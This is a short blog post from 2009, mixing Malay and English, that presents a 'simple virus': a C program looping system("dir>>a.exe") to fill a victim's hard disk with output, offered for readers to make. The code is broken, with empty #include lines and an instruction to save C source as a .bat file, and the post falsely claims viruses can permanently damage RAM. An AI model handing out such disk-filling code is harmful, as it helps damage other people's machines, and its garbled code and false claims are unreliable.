Friday, February 13, 2009
Making A simple virus

Hollla .... at begining u'all belajar comp program sure kebanyakkan nya u'all nak cipta VIRUS sendiri.but all the computer virus it is completely illegal in all countries.So , pandai buat , pandai la tanggung.kepada kanak2 baru nak mula jadi Pengodam.Dont's try this at HOME.
- There are some viruses too which can damage your RAM parmanently.
- I am going to give here a simple virus program which has only a few lines bur has ability to jam your Hard disc.
//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>╚a.exe");
}
}
//END
Save this code into notepad and change to .bat file..
p/s: WARNING ! Don't test on ur comp...!
Labels:
Makin' Virus
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment